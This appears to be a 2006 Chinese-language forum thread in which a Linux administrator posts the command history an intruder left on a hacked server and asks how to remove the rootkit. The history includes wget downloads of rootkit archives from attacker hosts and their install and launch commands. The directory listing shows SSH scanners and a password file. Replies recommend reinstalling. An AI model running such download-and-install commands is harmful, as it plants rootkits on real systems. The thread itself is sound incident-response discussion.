系统被HACK,怎么清他的rookit

crazysoul · 发表于 2006-3-7 17:10:10

可疑的命令历史如下:

  898  cd /var/tmp
  899  wget  www.mafiasef.go.ro/rknutza.tgz
  900  ftp
  901  tar xvfz rk.tgz
  902 rm -rf rk.tgz
  903  cd budu/
  904  nano hh
  905  ./install

  949  w
  950  uname -a
  951  cd /var/tmp
  952  ls -la
  953  cd /tmp
  954  ls -la
  955  cd /var/tmp
  956  ls
  957  wget www.bye.ro/rk.tgz
  958  tar zxvf rk.tgz
  959  cd rk
  960  cd cappy/
  961  ./setup
  962  cd ..
  963  cd sex/
  964  ./install
  965  cd ..
  966  cd rk2/
  967  cd rk2/
  968  ./start sirhack
  969  cd ..
  970  cd ..
  971  ./l4st root
  972  w
  973  cd ..
  974  ls
  975  ls
  976  rm -rf rk rk.tgz
  977  wget icil.ro/scan.tgz
  978  tar zxvf scan.tgz
  979  ls
  980  rm -rf scan.tgz
  981  cd .mr004/
  982  ls
  983  rm -rf bios.txt mfu.txt
  984  w
  985  screen
  986  ps -aef
  987  ps -aef
  988  ls
  989  ls
  990  ls
  991  ls
  992  ls
  993  ls
  994  ls
  995  ls
  996  ls
  997  ls
  998  ls
  999  ls
1000  reboot

具体情况跟
http://book.77169.org/data/web801/20050301/20050301__3666638.html
这里的一样,也是外连207.66.155.21:80,应该是中同样的一个马.

rootkit的目录:
[root@localhost .mr004]# ls -la
total 3608
drwxr-xr-x 2 root    root       4096 Feb 12 12:09 .
drwxrwxrwt 4 root    root       4096 Mar  7 16:52 ..
-rw-r--r-- 1 root    root          45 Aug 14  2005 .mr004
-rw------- 1 root    root       24576 Apr 22  2005 .ssh-scan.swp
-rwx------ 1 root    root       580 Apr 22  2005 a
-rwxr-xr-x 1 root    root       265 Apr 21  2005 gen-pass.sh
-rw-r--r-- 1 root    root    1973221 Feb  9 23:59 mfu.txt
-rw-r--r-- 1 root    root       5847 Jan 10 21:45 pass_file
-rwx------ 1 root    root       25503 Feb  9 23:59 pscan2
-rwxr-xr-x 1 root    root    306336 Feb  9 23:59 screen
-rwx------ 1 root    root    458068 Feb  9 23:59 ss
-rwxr-xr-x 1 root    root    846832 Feb  9 02:20 ssh-scan
-rw-r--r-- 1 root    root          0 Feb 11 22:52 vuln.txt
-rwx------ 1 root    root          94 Sep  3  2005 x

看日期好象很久了啊

听说rk.tgz这个rookit会替换SSHD等一些常用命令,我该怎么清理这个rookit?
能不能用yum一次更把可能被替换的程序替换回来(远程服务器,重装系统极不方便)?

晨想 · 发表于 2006-3-7 17:22:34

。应该可以，，不过你要仔细看看，是否有什么别的后门。。呵呵。

crazysoul · 发表于 2006-3-7 17:47:10

Post by 终极幻想
。应该可以，，不过你要仔细看看，是否有什么别的后门。。呵呵。

已经下载了chkrootkit-0.46a在扫描,还没扫完,但已有警报:
Searching for Madalin rootkit default files... Possible Madalin rootkit installed
Searching for Fu rootkit default files... Possible Fu rootkit installed

还有几个信息看不懂:
Checking `inetd'... Unknown HZ value! (188) Assume 100.
Checking `sshd'... Unknown HZ value! (188) Assume 100.
Checking `tcpd'... Unknown HZ value! (188) Assume 100.

是这几个服务被修改了吗?

前些日子用logcheck来监控,也没见有成功的登陆SSH的记录(只怕连ssh也hack了,想换key验证也不熟操作,断了SSH更麻烦).今天服务器突然重启才看了history(有没记录命令时间的日志啊?),才发现问题.

用yum检查修改并更新要怎么做,请明示啊,本人linux入门菜鸟一只(不要老是叫我看书搜索啊,先弄点远水救下近火先,以后会再慢慢操熟它的)

hiei · 发表于 2006-3-8 11:19:20

备份系统，重装。
永远不要相信已经被渗透过的系统。

晨想 · 发表于 2006-3-8 15:58:31

Post by hiei
备份系统，重装。
永远不要相信已经被渗透过的系统。

作为系统管理员，这个是金科玉律。。除非条件限制不允许重装。

blackwhite · 发表于 2006-3-9 06:29:27

这个是这里第二次说这个吧。估计都是系统有漏洞，让人渗透进入，获得了root的权限。

晨想 · 发表于 2006-3-9 07:03:39

而且rootkit用的都是同一个。。看来还是很流行的一个rootkit。。。

		自动登录	找回密码
密码			注册

系统被HACK,怎么清他的rookit

浏览过的版块